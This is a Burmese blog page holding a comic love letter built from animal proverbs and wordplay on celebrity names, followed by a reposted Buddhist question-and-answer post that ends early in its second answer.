ပန္းေလးလွေတာ့ လိပ္ျပာေတြ ဝဲတယ္တဲ့။ သိုးငယ္ေလးလို ျဖဴစင္ျပီး သမင္မ်က္လံုးမွာ ဇင္ေယာ္ေတာင္ မ်က္ခံုးေလးနဲ႕ ငါးရံ႕ကိုယ္လံုးေလးကို ပိုင္ဆိုင္ထားတဲ့ သူကေလးကို ခ်စ္မိသူထဲမွာ ကိုလဲ အပါအဝင္ေပါ့။ သူေလးမိဘေတြရဲ႕ျပည့္စံုမႈေၾကာင့္ တပါးသူေတြ ဆင္ၾကံၾကံ ဝံပုေလြေခ်ာင္း ေခ်ာင္းေနၾကေပမယ့္ ကိုကေတာ့ ရိုးသားစြာ ခ်စ္တာပါ။သူေလးရဲ႕ စြန္ရဲလို စူးရွတဲ့ အၾကည့္ေတြမွာ အၾကိမ္ၾကိမ္ က်ရံုးခဲ့သူေလ။ ေပတစ္သီး ၊ က်ီးတစ္သား လို ေပါက္ဖြား လာတဲ့ ကို႕ရဲ႕အခ်စ္ပါ။ ကိုကေတာ့ ဥစၥေခ်ာ ရုပ္ေပါ ၊ ဘဲလိုအသံ ၊ ကြၽဲလိုအသား ၊ ဇီးကြက္မ်က္လံုး ၊ လိပ္ခါးနဲ႕ ဖားဖင္ငါးပါးၾကံအင္လကၡဏာ ျပည့္စံုသူပါ။ ဒါေပမယ့္ ျခေသၤ့လုိ တည္ၾကည္ျပီး က်ားလုိ ရဲရင့္သူေနာ္။ ဘဝေပး အေျခအေနေၾကာင့္ က်ီးကန္းနဲ႕ ဗ်ိဳင္း တုႏိႈင္းလို႕ မရႏိုင္တာေၾကာင့္ ဆင္ျဖဴမ်က္ႏွာ ဆင္မဲမၾကည့္ဝ့ံ သ လိုေတာ့ ျဖစ္မိသား။ မိေခ်ာင္းမင္း ေရခင္းျပတာမဟုတ္ေပမယ့္ သူေလးေသခ်ာ စဥ္းစားဆံုးျဖတ္ပါ။ အခ်ိန္အတိုင္းအတာ တစ္ခုေရာက္ ရင္ေတာ့ ရွဥ့္လည္းေလွ်ာက္သာ ပ်ားလည္းစြဲသာ ျဖစ္မယ့္ အေျဖေလးေပးေပါ့။ အေျဖမရမခ်င္း ဝက္အစာေတာင္း သလို တက်ီက်ီ မအီမိေအာင္ က်ိဳးစားထိန္းႏိုင္ေပမယ့္ ေခြးေနရာမရသလို ေနမထိထိုင္မသာေတာ့ ျဖစ္ေနရမွာပါ။
ညည အိမ္မက္ထဲမွာေလ… သူေလးနဲ႕ကို လားၾကီးစီးလုိ႕ ကမၻာအျပင္ဘက္ကို သြားၾကတယ္တဲ့။ သူေလးအတိတ္မွာမွားခဲ့တာေတြရွိရင္ေတာင္ ကို႕ဘဝတစ္ခုလံုး ႏြားအျဖစ္ခံျပီး သားပိုက္ေကာင္လို ကို႕ရင္ခြင္ထဲမွာ သူေလးကို ထားျပီးေၾကာင္ေလးကို ယုယသလို ယုယမႈ ေလးေတြ ေပးခ်င္တယ္ကြာ။ သူေလးရဲ႕ ေမတၱာေတြနဲ႕ တုန္႕ျပန္လာမယ့္စာကေလးကို သစ္ကုလားအုပ္လုိ အေမွ်ာ္လင့္ၾကီး ေမွ်ာ္လင့္ေန မယ္ေနာ္။ ကိုေမွ်ာ္လင့္သလိုေလး ျဖစ္လာရင္ေတာ့ငါးသေလာက္ျပံဳးေလး နဲ႕ ျမင္းတစ္ေကာင္လို အေျပးေလး လာခဲ့မယ္ သူေလးရယ္….
အခ်စ္ရယ္ ဒီစာကိုေရးလိုက္လို႔ ကိုယ့္ငါးခ်ဥ္ ကိုယ္ခ်ဥ္တယ္၊ မိေက်ာင္းမင္း ေရခင္းျပတယ္၊ ခ႐ု ခါးေတာင္းက်ိဳက္ဖမ္းတယ္လို႔ မထင္ေစခ်င္ဘူးေနာ္။ ကိုယ့္မွာ မင္းကိုခ်စ္မိမွပဲ ခဲမွန္ဖူးတဲ့ စာသူငယ္လိုလို၊ မပိုင္၀က္ေမြးဆိုသ လို လို၊အိတ္ေပါက္နဲ႔ ဖားေကာက္ဆိုသလိုလို ျဖစ္ေနပါၿပီ။
အခုအခ်ိန္မွာ ၀က္ျဖစ္မွေတာ့ မစင္ေၾကာက္ေန လို႔လည္း မထူးေတာ့ပါဘူးေလ။မင္းအေဖကို ေျပာလိုက္ပါ ျမင္းကမလႈပ္ ခံုကလႈပ္၊ ယုန္ကမတိုး ပိုက္ကတိုး ျဖစ္မေနပါနဲ႔လို႔။ ယူမွာက မင္းကိုပါ။ ဘယ္ႏွယ့္သူကကဲကဲလႈပ္ေနရ တာလဲလို႔။
ၾကက္တူေ႐ြး က ေတာ္ေတာ္ မယ္ေဘာ္က ကဲမေနပါနဲ႔လို႔။ မင္းအေဖက ကိုယ့္ကိုေျပာတယ္ ငေၾကာင္ တဲ့။ မင္းဟာအလုပ္မရွိ ေၾကာင္ေရခ်ိဳးေပးေနတဲ့့ ေကာင္စားမ်ိဳးတဲ့။ ဒါေပမဲ့ေျပာလိုက္ပါ ကိုယ္ဟာ ေၾကာင္ သူေတာ္ ႂကြက္ သူခိုးမဟုတ္သလို ေတာမီးေလာင္ေတာေၾကာင္ လက္ခေမာင္းခတ္တဲ့ ေကာင္စားမ်ိဳးေတာ့ မဟုတ္ပါဘူးလို႔။ ကိုယ့္ရဲ႕ မျဖစ္စေလာက္သာရတဲ့ လစာေလးဟာ ေၾကာင္အို ႂကြက္မေလး ဆိုသလိုျဖစ္ေနေတာ့ေလ …….ေနာက္ၿပီးေတာ့ မင္းကို လာလာေၾကာင္ေနတဲ့ သေဘၤာသားဆိုတဲ့ အေကာင္ကလည္း မင္းအေဖလို လူအတြက္ ေၾကာင္ခံတြင္းပ်က္ႏွင့္ ဆက္ရက္ေတာင္ပံက်ိဳးလိုဟိုေကာင့္အတြက္က်ေတာ့ ကံေကာင္း တဲ့က်ား သြားရင္းသမင္ေတြ႕ဆိုသလိုျဖစ္ေနတာေပါ့။
သူမ်ား အေၾကာင္း လည္းမေျပာခ်င္ပါဘူးအခ်စ္ရယ္ ဒီေကာင့္မိဘက ခ်မ္းသာေတာ့ က်ားႀကီး ေျခရာႀကီး ၊ ေ႐ႊပင္နားေတာ့့ ေ႐ႊေက်းမ်ိဳးေတာ့ျဖစ္မွာေပါ့ေလ။ တကယ္ေတာ့့ သူ႔မိဘေတြဟာ ဒီယုန္ျမင္လို႔ဒီ ခ်ံဳ ထြင္၊ ႂကြက္ေသ တစ္ခု အရင္းျပဳ႐ံုေလးနဲ႔ စားရကံၾကံဳၿပီးမုတ္ဆိတ္ပ်ားစြဲ၊ ထန္းသီးေႂကြခိုက္ က်ီးနင္းခိုက္ျဖစ္လို႔၊ ၾကက္ကန္းဆန္အိုးတိုးကာယုန္ေထာင္ေၾကာင္မိ ျဖစ္သြားသူေတြပါ။ အမ်ားညီဤကိုကြ်ဲဖတ္ ဆိုသလို လုပ္ခ်င္ ရာလုပ္ေနတဲ့ ေျပာေတာ့ေၾကာင္သူေတာ္ ယိုေတာ့ ႂကြက္ေမႊး ဆိုတာသူ႔မိဘေတြေပါ့။ ဆင္သတ္ အရပ္ေ၀ၿပီးမွ ဆင္သားေရကို ဆိတ္သားေရနဲ႔ဖံုးခ်င္တာ သူတို႔အသိုင္းအ၀ိုင္းေပါ့။ ကိုယ္အထင္အႀကီးပါဘူး။ အထင္လည္း မေသးပါဘူးေနာ္။
ဒီေကာင္ကေတာ့ ကြ်ဲကူးေရပါ ဆိုတဲ့အတိုင္းသူစီးတဲ့ျမင္း အထီးမွန္း အမမွန္းေတာင္ မသိ၊ မိဘဆိုတာလည္း က်ီးဘုတ္႐ိုေသ၊ ဘုတ္က်ီး႐ိုေသတဲ့ အဆင့္ေတာင္မရွိ၊ ေခြးကေလးအေရာ၀င္ ပါးလ်က္နားလ်က္၊ က်ီးကန္းသူေကာင္းေျမႇာက္ ေခ်းေကာက္စား ဆိုတဲ့သူမ်ိဳးပါ။ ထားလိုက္ပါေလ။ ေခြး႐ူးေကာင္းစား တစ္မြန္းတည့္ပါပဲ။ အခ်ိန္တန္ေတာ့ႏြားပိန္ကန္ပါလိမ့္မယ္။
တကယ္လို႔ မင္းသာအဲဒီအေကာင္နဲ႔ညားရင္ ဆင္နားရြက္ႂကြက္တပ္၊ ႂကြက္နားရြက္၀က္တပ္ ေပးသလိုမ်ိဳး ကို႔႐ိုးကားရား ျဖစ္ေနမွာ။ မင္းအေဖကလည္းေၾကာက္ပါတယ္ဆို ေၾကာင္နဲ႔တို႔ ဆိုသလို မင္းမလိုခ်င္တာကိုပဲ စြတ္ၿပီး ငါးၾကင္းဆီနဲ႔ ငါးၾကင္းေက်ာ္ခ်င္ေနတာ။ ကိုယ္ကေတာ့ မင္းမိဘႏွစ္ပါးေၾကာင့္ ကြ်ဲႏွစ္ေကာင္ၾကားထဲက ေျမစာပင္၊ က်ားခ်င္းကိုက္ရာ သမင္းလမ္းကူးမွား ျဖစ္မယ့္ မင္းျဖစ္အင္ကိုသာေတြးေတြး ရင္ေမာၿပီး ၾကမၼာေဆာင္သားေကာင္ဆိတ္ျဖစ္ေနပါၿပီ။ တကယ္ပါအခ်စ္ရယ္ မင္းအေဖဟာ ငွက္တစ္ေကာင္ ျမားတစ္စင္း၊ ရွဥ္႔တစ္ေကာင္ျမားတစ္စင္း ဆိုတာ ကို ျမင္ပံုမရဘူး။ေၾကာင္႐ုပ္ျဖစ္ေစ ႂကြက္ေသတာလိုရင္းဆိုၿပီး စြတ္မိုက္ေနတာ။
အင္း… မေျပာခ်င္ ပါဘူးေလ …ငါးတကာယိုသည့္ေခ်းပုဇြန္ဆိတ္ ေခါင္းမွာစု လို႔ပဲေျပာေျပာ၊ ငါးခံုးမတစ္ေကာင္ေၾကာင့္ တစ္ေလွလံုးပုပ္ လို ႔ပဲေျပာေျပာ။ သူ႔မိဘေတြကလည္းဒီေကာင့္ေၾကာင့္ နာမည္ပ်က္ေနတာၾကာပါၿပီ။ တကယ္ေတာ့ အညီႇရွိ ရာ ယင္အံုဆိုသလို မင္းအေဖဆီကို ဒီေကာင္ဟာငါးပြက္ရာငါးစာခ်ဖို႔ ေရာက္လာတာပါ။ ၿပီးေတာ့ ဆင္ေကာင္ႀကီး အၿမီးက်မွတစ္ဆိုသလို၊ ငါးစိမ္းျမင္ ငါးကင္ပစ္လုပ္သြားဦးမွာ။ ေနာက္ဆံုးက်မွ ဒီေကာင့္ေၾကာင့္ လူတြင္ ပါႏြား က်ားကိုက္ဆိုတဲ့အခ်ိန္၊ က်ားေသကို အသက္သြင္းလို႔ စင္းစင္းေသပါၿပီလို႔ မင္းအေဖေအာ္ေန ဦးမွာ။ အဲလို ဖြတ္ထြက္မွ ေတာင္ပို႔မွန္းသိတဲ့အခ်ိန္မွာ က်ားေရွ႕ ေမွာက္လ်က္လဲ သလိုျဖစ္ေနမယ့္ မင္းအေဖ ရဲ႕ ကိုယ့္ေယာကၡမေလာင္းႀကီးရဲ႕ ေသခ်င္တဲ့က်ား ေတာေျပာင္းအျဖစ္ကို ကိုယ္ျမင္ေယာင္မိေနတယ္။
မင္းအေမႀကီးက်ေတာ့လည္း ဒီေကာင္နဲ႔ေပးစားခ်င္တိုင္း သမီးတစ္ေကာင္ ႏြားတစ္ေထာင္ဆိုၿပီး အရပ္ထဲမွာ လက္ပံပင္ဆက္ရက္က် သလို ပြက္ပြက္ညံေနပါေရာ။ တကယ္က်ေတာ့ ရွမ္းႀကိဳက္ႏြားေခ်ာဆိုတာ ကိုယ္ ကေတာ့ ေႁမြေႁမြျခင္းေျချမင္ၿပီးသားပါေနာ္။ အင္း… ႏြားအို ျမက္ႏုႀကိဳက္သလို မင္းအေဖႀကီးေငြႀကိဳက္ တာလည္း ႏြားငတ္ေရခ် ဆိုသလို၊ကိုယ့္အတြက္ေတာ့ အထူး အဆန္း မ ဟုတ္ေတာ့ပါဘူး။ မင္းအေဖက ဆင္သြားရင္လမ္းျဖစ္မယ္လို႔ထင္ေနတာေလ။ငါးစာသာျမင္ ငါးမွ်ားခ်ိတ္မျမင္ ဆိုသလိုမ်ိဳး ျဖစ္ေနတာေပါ့။ ဒါထက္ သမီးေခ်ာေလးအရွိန္နဲ႔ ဆင္ျဖဴေတာ္မွီၿပီး ၾကံစုပ္၊ေမ်ာက္ျပဆန္ေတာင္း လုပ္ေနတယ္လို႔လည္း မေျပာခ်င္ပါဘူး။ ႏြားေပါ့ အစံြထုတ္လုိ႔ ေျပာရင္ မင္းပါ စိတ္ဆိုးေတာ့မယ္။
အင္း… ဆင္ျဖဴ႕မ်က္ႏွာဆင္မည္းမၾကည့္၀ံ့ ဆိုသလို ကိုယ့္ရဲ႕ မိဘ Background ကလည္း သူ႕အတြက္ ဆို ႏြားပ်ိဳသန္လွ ႏြားအိုေပါင္က်ိဳး သာသာပဲရွိေတာ့့… အင္း… ယုန္အတြက္ခ်ံဳကေၾကာင့္ၾကေန ရတာေပါ့။ မင္းအေဖကေျပာတာ။ ကိုယ့္ကို ေခြးမသား တဲ့။ ေခြးၿမီးေကာက္က်ည္ေတာက္စြပ္တဲ့။ မင္းကိုလည္း မြဲခ်င္တဲ့ေခြး ျပာပံုတိုးဆို။
ဟုတ္ခ်င္လည္းဟုတ္မွာပါ ကိုယ့္အေျခအေနကလည္း လူမေလး ေခြးမခန္႔တဲ့ အျပင္၊ အရပ္က လည္း ေခြး ပစ္တဲ့တုတ္သာသာရွိေတာ့…ကိုယ္နဲ႔ေပးစားမယ့္အစားေခြးအၿမီးျဖတ္ၿပီးသာ ေပးစားမယ္တဲ့။ အဲဒါကို ဟို အေကာင္ၾကား ရင္သူ႔ကိုေခြးအၿမီးျပတ္နဲ႔ ႏိႈင္းတယ္ဆိုၿပီး စိတ္ဆိုးဦးမယ္။ တကယ္က်ေတာ့ ကိုယ္ဟာ ေခြးရူး ဖက္ကိုက္ ေခြးေကာင္းနားရြက္ျပတ္ျဖစ္သြားမ ွာ ေၾကာက္ တဲ့ေခြးျဖဴေတာမတိုး၀ံ့တဲ့သူပါ။
ကဲပါ… ေခြးေဟာင္လို႔ေတာင္ပို႔မေျပးႏိုင္ပါဘူး။ ပိုေနျမဲက်ားေနျမဲပါအခ်စ္ရယ္။ တစ္ခုေတာ့မင္းအေဖကိုေျပာခ်င္တယ္။ ေဟာင္လြန္းသည့္ေခြး လူမေလးတတ္ဘူးဆိုတာကို။
က်န္ေသးတယ္….. မင္းအေဖကပဲေျပာတာေနာ္ ကိုယ္ဟာ ေတာ္ေတာ္ႏြားက်တဲ့့ေကာင္တဲ့့။ ကိုယ္ကလည္း ဘယ္ရမလဲ၊ဒါေပမဲ့ ခင္ဗ်ားလိုငါ့စကားႏြားရ မေျပာတတ္ဘူး၊ ႏြားသိုးႀကိဳးျပတ္ မရမ္းတတ္ဘူးလို႔ ႏြားေရွ႕ ထြန္ က်ဴးျပလိုက္တာေပါ့။
အခ်စ္ရယ္ ကိုယ္ဒီစကားေတြေျပာေနရတာ က်ားလိုက္မွ တုတ္ခုတ္၊ ဆင္လိုက္မွသစ္ပင္ရွာတာ မဟုတ္ပါဘူးေနာ္။ ကိုယ့္မွာ ရွာသမွ် ပိုက္ဆံကလည္းသမင္ေမြးရင္း က်ားစားရင္း ဆိုသလိုျဖစ္၊ ကံအေၾကာင္းက မသင့္ေလေတာ့့ ေႁမြေပြး ခါးပိုက္ပိုက္မိလ်က္သားလည္းျဖစ္၊ က်ားခ်င္းကိုက္ရာ သမင္ကူမမွားဖို႔အေရး၊ ပ်ားလည္းစဲြသာ ရွဥ့္လည္းေလွ်ာက္ သာ ျဖစ္ေအာင္လုပ္ရင္း ေႁမြမေသ တုတ္မက်ိဳး Style မ်ိဳးျဖစ္သြားေတာ့၊ ဖြတ္မရ ဓါးမဆံံုး၊ ငါးမရ ေရခ်ိဳးျပန္ ႐ံံု ေလးပါ။
ကိုယ့္မွာေတာ့က်ားလည္းေၾကာက္ရ က်ားေခ်းလည္းေၾကာက္ရဆိုသလို မင္းမိဘေကာ၊ မင္းကိုပါ လန္႔ၿပီး က်ားရဲရာ ၾကမၼာ ႐ိုးသာဆိုသလိုျဖစ္ေနရပါၿပီေလ။ တကယ္တမ္းဆိုရင္ ကိုယ္ဟာျမင္းေကာင္း ခြာလိပ္ ေလး ပါကြယ္။ မင္းအေဖ ကလည္း ကိုယ္ကမင္းကိုခ်စ္ပါတယ္ေျပာတိုင္း ႀကိဳးၾကာဆို ဘာငွက္လဲ၊ က်ား ကိုက္ပါတယ္ဆို နာတာ ရွည္လား ခ်ည္း လာလာေမးေနေလတယ္။ ဆင္ေကာင္ႀကီးေတြ႕မွေတာ့ ဆင္ေျခရာ ရွာစရာ လိုေတာ့ မလားကြယ္။ ကိုယ္ကလည္း မင္းအေဖေရွ႕မွာ ကြ်ဲပါးေစာင္းတီး… အဲ…မိေက်ာင္းမင္း ေရခင္းျပေတြ ခဏခဏ မလုပ္ခ်င္ ပါ ဘူးေလ။
လူပဲအခ်စ္ရယ္စင္းလံုးေခ်ာေတာ့ ဘယ္ျပည့္စံုမလဲ။ သိၾကားမင္းေတာင္ ကြ်ဲေယာင္ေဆာင္တာ ဂ်ိဳကားတယ္ လို႔ ေျပာခံ ရေသး တာပဲ။ထားဗ်ာ။ ပံုလံုတစ္လွည့္ ငါးပ်ံ တစ္လွည့္ ဆို တဲ့ေန႕က်ရင္ေတာ့ သူသိမွာပါေလ။ ဒါမွမဟုတ္မ်ား ယာ လည္း ညက္ေစၾကက္္လည္းပန္းေစ လို႔မ်ား လုပ္ေနသလားမသိဘူးေလ။ မေျပာခ်င္ပါဘူး အခ်စ္ရယ္ လင္းတေလာက္ေတာ့ ငွက္တိုင္းလွႏိုင္ပါတယ္။ ႏြားေၾကာ့ဆိုေလ ခ်ံဳတိုးေလဆိုတာမ်ိဳးကိုယ္မလုပ္တတ္ပါဘူး။ အလကားရတဲ့ သမက္… အဲ… ႏြား သြားျဖဲၾကည့္မေနပါနဲ႔လို႔။ မေကာင္းပါဘူးေလ။ ႏံွျပည္စုတ္အေျမႇာက္နဲ႔ခ်ိန္တတ္တဲ့ မင္းမိဘေတြကို လက္တုန္႔မျပန္ခ်င္ေပမယ့့္လည္း တခါ တခါက်ရင္ အၾကံကုန္ ဂဠဳန္ဆားခ်က္လုပ္ၿပီး ႂကြက္မႏိုင္ က်ီမီး႐ိႈ႕ခ်င္႐ႈိ႕ပစ္မိေတာ့ မွာ။ ေရာ့…ပတၱျမား ေရာ့့ …နဂါး မွလုပ္တတ္တဲ့ မင္းမိဘေတြကို ဆင္လည္းဆင္အထြာႏွင့္ ပု႐ြက္ဆိတ္လည္း ပု႐ြက္ဆိတ္အထြာ နဲ႔ပါလို႔ ၾကံဳရင္ေျပာလိုက္စမ္းပါ။ ဘာပဲျဖစ္ျဖစ္ေလ မိဘဆိုတာသားသမီးကို ဆင္စီးၿပီး ျမင္းရံေစခ်င္တာ ကို ကိုယ္သိပါ တယ္။ ဒီေတာ့ ေမ်ာက္သား စားခ်င္ ေမ်ာက္မ်က္ႏွာၾကည့္ ဆိုသလိုကိုယ္နာလည္ေပးရမွာေပါ့။
တကယ္ပါ အခ်စ္ရယ္ ကိုယ့္ဘ၀ဟာ ေရတြင္းထဲက ဖားသူငယ္လို၊ ကိုယ့္အျဖစ္ဟာေပါ့ေစလိုလို႔ ေၾကာင္႐ုပ္ထိုးေဆးေၾကာင့္ေလး ဆိုသလိုျဖစ္႐ံုမက ကိုယ့္အသည္းႏွလံုးေတြဟာ မင္းနဲ႔ေ၀းမွ က်ီးကန္းေတာင္းေမွာက္၊ ငါးရံ့ျပာ လူး၊ေၾကာင္မရွိႂကြက္ထ ဆိုသလိုမ်ိဳး ျဖစ္ေနပါၿပီ။ ဒီေလာက္လွတဲ့ သမီးမ်ိဳးကို ေမြးထားတဲ့ မင္းအေဖ ကို ေျပာ လိုုက္ပါ။
အိုင္ေတြ႕လို႔မွမလူးကြ်ဲ႐ူး၊ ငါးေၾကာ္မႀကိဳက္ ေၾကာင္မိုက္ျဖစ္သြားမွာေပါ့လို႔။ ဘာပဲေျပာေျပာပါ။ မင္းမရွိတဲ့့ ကိုယ့္ဘ၀ဟာ ႏြားကြဲ က်ားကိုက္ ဆိုသလိုျဖစ္လို႔၊ မင္းဆီက ကိုယ္ေမွ်ာ္ေနတဲ့့ အခ်စ္ေတြကလည္း က်ားသနား မွ ႏြားခ်မ္းသာရမဲ့ ဘ၀မ်ိဳးျဖစ္ေနပါၿပီ။ ယံုပါ၊ ကိုယ္ဟာ မ်က္ႏွာမမ်ားတတ္သလိုလယ္ထြန္သြား ႏြားေမ့ လူစား မ်ိဳးလည္း မဟုတ္ တာအမွန္ပါ အခ်စ္ရယ္။တကယ္ပါအခ်စ္ရယ္… ကိုယ့္ရင္ထဲက အခ်စ္ေတြဟာ မင္းတုန္႔ျပန္မွ စူဠလိပ္ေရ ထဲ လႊတ္သလိုမ်ိဳး စိုင္ေကာ္လို႔ခ်ံဳေပၚေရာက္ၿပီး ေ႐ႊပင္မွာနားတဲ့ေ႐ႊေက်းေလး ျဖစ္ေတာ့မွာပါ။
ခ်စ္သူ . . . .ငါမင္းကိုခ်စ္တာ မာသာထရီဇာ လို မာယာပလီပလာ ေတြမပါ ပါဘူး . . .မယံုရင္က်န္ေက်ာင္း လို မွန္ေျပာင္းသံုးပီး ၾကည့္လိုက္စမ္းပါ။ (ႏွလံုးသားထဲကိုပါ)မင္းကိုခ်စ္တဲ့သူေတြမ်ားထဲ ဂ်ဴလိယက္ဆီဇာ လို အလုအယက္ဆီးပါ လို႕မေျပာပါနဲ႕ပါးႀကီးမွာေမြးလို႕ မာနႀကီးတက္လို႕ပါ။တကယ္ဆိုငါဟာမင္းကို ဘင္လာဒင္လာ ဒင္လို ၾကင္နာျခင္တဲ့သူပါ ရယ္ ။မင္းေဘးမွာ အျမဲတမ္း ဒိုင္ယာနာ လို ထိုင္ကာသာ ေနလိုက္ျခင္ပါရဲ႕ . . .အဲ့ဒီအခါၾကရင္ ေဂ်ာ့ဘြတ္(ရ္) လို ေလာကြတ္ေလးလိုေတာ့လုပ္ပါ . .အာရာဖတ္လို ဘာလာကတ္ေနတာလဲ လို႕ ေအာ္မထုတ္လိုက္ပါနဲ႕ေနာ္ . ..စိတ္ႀကီးတဲ့ေနရာမွာ ထိပ္သီးမိုလို႕ပါ။
မဟုတ္ရင္ ေပါင္ခ်ိန္ကို ေျဗာင္လိန္တာထက္ ဆိုးသြားလိမ့္မယ္။တကယ္ေတာ့ ငါဟာအို၀င္ လို အပ်ိဳျမင္တိုင္းငမ္းေနသူ မဟုတ္ပါဘူးကြယ္။မင္းကိုရမယ္ဆိုရင္ေလ ေကာလင္းပါ၀လ္ လို ေတာတြင္းေတာင္ထဲမွာေနၿပီးထယ္ေစာက္လို လယ္ေပါက္ေကၽြးဆိုလဲ ေကၽြးပါမယ္။မင္းအတြက္ Prado ၀ယ္မေပးႏိုင္ေပမဲ့ ဆရာခိုေတာ့၀ယ္လိမ္းေပးႏိုင္ပါတယ္ ။ကြန္ဒိုမွာမထားႏိုင္ေပမဲ့ သြန္ဆိုသြန္ထားႏိုင္ပါတယ္။(ေရအိုး)မင္းကသာ ထြာ၀ူခ်န္း လို သြားယူစမ္းဆိုရင္ေလ ကိုေရႊထူးလို ေျမေတြတူးလို႕ႏိုက္ရဲပါတယ္ ။ (လိပ္ဥ)ဒါေတြကို ဆန္ဖရန္စကို လို အႀကံအဖန္ေတြပိုတယ္လို႕မထင္ပါနဲ႕ေနာ္။လန္ဒန္ လို အမွန္အကန္ပဲဆိုတာ ယံုၾကည္ၿပီး နီကိုရဲ လိုဒီလိုပဲလို႕ေ၀့လည္ေၾကာင္ပတ္လုပ္ပါနဲ႕ေတာ့။ကိုယ့္အခ်စ္ေတြကို ဘက္ခမ္း လို လက္ကမ္းၿပီး ႀကိဳလင့္ပါေတာ့ကြယ္ . . ဟီး ေမးထဲေရာက္လာလို႕ တင္ေပးလိုက္တယ္ ခ်စ္သူကို ရည္းစားစာေရးၿပီး ေပးတတ္ေအာင္လို႕
Xai Yak Techonology
Saturday, September 8
Thursday, August 2
ဗုဒၶဘာသာတရားကို မယံုၾကည္လို႔ေမးေသာေမးခြန္းမ်ားကို တိက်ေသာေျဖရွင္းခ်က္...။
ဗုဒၶဘာသာကိုအဖ်က္သေဘာနဲ႔ေမးခြန္းေတြေမးလာခဲ့ရင္ျပန္လည္ေျဖႀကားနိုင္ရန္အတြက္
ဒီပိုစ့္ကိုထပ္ဆင့္မွ်ေ၀ေပးလိုက္သည္..။။
****************************
ဗုဒၶဘာသာတရားကို မယံုၾကည္လို႔ေမးေသာေမးခြန္းမ်ားကို တိက်ေသာေျဖရွင္းခ်က္...။
**********************************************************
(၁) - ဗုဒၶဘာသာဆိုတာ ဘာလဲ။
(၂) - ဒီလိုဆိုရင္ ဗုဒၶဘာသာဟာ ဒႆနပညာရပ္ တစ္ခုဘဲေပါ့။
(၃) - ဗုဒၶဆိုတာ ဘယ္သူပါလဲ။
(၄) - ဗုဒၶဟာ သူ႕ရဲ႕ၾကင္ယာေတာ္နဲ႕ သားေတာ္ကို ပစ္ထားခဲ့တဲ့အတြက္
တာ၀န္မဲ့ရာ မေရာက္ဘူးလား။
(၅) - ဗုဒၶက ပရိနိဗၺာန္ စံသြားၿပီဆိုေတာ့ သူက ကြၽႏု္ပ္တို႕ကို ဘယ္လို ကူညီႏိုင္ပါသလဲ။
(၆) - ဗုဒၶဟာ ထာ၀ရဘုရား (God) လား။
(၇) - ဗုဒၶဟာ ထာ၀ရဘုရား မဟုတ္ရင္ ဘာေၾကာင့္ သူ႕ကို လူေတြက ရွိခိုးကိုးကြယ္ေနၾကသလဲ။
(၈) - ဗုဒၶဘာသာ၀င္မ်ားဟာ ႐ုပ္တုကို ကိုးကြယ္ၾကတယ္လို႕ တခ်ိဳ႕လူမ်ားက ေျပာတာ ၾကားဘူးပါတယ္။ ဟုတ္ပါသလား။
(၉) - တ႐ုတ္ ဗုဒၶဘာသာ ဘုရားေက်ာင္းေတြ ထဲမွာ စကၠဴပိုက္ဆံေတြကို မီး႐ႈိ႕တာေတြ၊ ၿပီးေတာ့ တျခား ထူးထူးဆန္းဆန္း လုပ္ၾကတာ ေတြ႕ၾကရပါတယ္။ အဲဒါေတြကို ဘာေၾကာင့္ လုပ္ၾကပါသလဲ။
(၁၀) - ဗုဒၶဘာသာ၀င္ေတြ ကုသိုလ္ျဖစ္ လုပ္ငန္းေတြ လုပ္ၾကတာ သိပ္မၾကားမိပါဘူး။ အဲဒါ ဘာေၾကာင့္လဲ။
(၁၁) - ဘာေၾကာင့္ ဗုဒၶဘာသာေတြ အမ်ိဳးမ်ိဳး ကြဲျပားေနပါသလဲ။
(၁၂) - သင္က ဗုဒၶဘာသာကို အလြန္ အထင္ႀကီးတာပဲ။ သင္ဟာ သင့္ဘာသာတရားကို မွန္တယ္လို႕ ယူဆၿပီး တျခားဘာသာ အားလံုးကို မွားတယ္လို႕ ယူဆပံုရတယ္။
(၁၃) - ဗုဒၶဘာသာဟာ သိပၸံနည္း က်ပါသလား။
Please Click Here : For English Version
(၁) ေမး - ဗုဒၶဘာသာဆိုတာ ဘာလဲ။
ေျဖ - “ဗုဒၶဘာသာ“ ဆိုတဲ့ စကားလံုးဟာ “ဗုဒၶိ“ ဆိုတဲ့ စကားလံုးမွ လာတာပါ။ “ဗုဒၶ“ ဆိုတာ (ကိေလသာ တည္းဟူေသာ အိပ္ေပ်ာ္ျခင္းမွ) “ႏိုးလာသူ“ လို႕ အဓိပၸါယ္ရပါတယ္။ ဒါေၾကာင့္ ဗုဒၶဘာသာဆိုတာ ႏိုးၾကားေရး အေတြးအျမင္ (ဒႆန) ပညာပါပဲ။ ဒီဒႆနပညာကို ေဂါတမႏြယ္ဖြား သိဒၶတၳ မင္းသားကေန ဘုရား ျဖစ္လာတဲ့ ဗုဒၶျမတ္စြာဘုရားက စတင္ေဟာေျပာခဲ့ပါတယ္။ ဗုဒၶရွင္ေတာ္ျမတ္ဘုရားဟာ သက္ေတာ္ ၃၅ႏွစ္မွာ (ကိေလသာ တည္းဟူေသာ အိပ္ေပ်ာ္ျခင္းမွ) ႏိုးလာၿပီးလွ်င္ ဘုရားအျဖစ္သို႕ ေရာက္ေတာ္မူပါသည္။ ဗုဒၶဘာသာဟာ ႏွစ္ေပါင္း ၂၅၀၀ ေက်ာ္ ၾကာျမင့္ခဲ့ၿပီ ျဖစ္လို႕ ဗုဒၶဘာသာ၀င္ေပါင္း သန္းသံုးရာေက်ာ္ ရွိေနပါၿပီ။ လြန္ခဲ့တဲ့ ႏွစ္ေပါင္း တစ္ရာေလာက္ အထိေတာ့ ဗုဒၶဘာသာဟာ အေရွ႕တိုင္း ဒႆနပညာရပ္ တစ္ခုအျဖစ္သာ တည္ရွိခဲ့ပါတယ္။ သို႕ေသာ္လဲ ယခုအခ်ိန္မွာ ဥေရာပႏွင့္ အေမရိကတိုက္ရွိ ႏိုင္ငံေပါင္း မ်ားစြာမွာလဲ ဗုဒၶဘာသာ၀င္ ဦးေရတျဖည္းျဖည္း တိုးပြါးေနပါတယ္။
(၂) ေမး - ဒီလိုဆိုရင္ ဗုဒၶဘာသာဟာ ဒႆနပညာရပ္ တစ္ခုဘဲေပါ့။
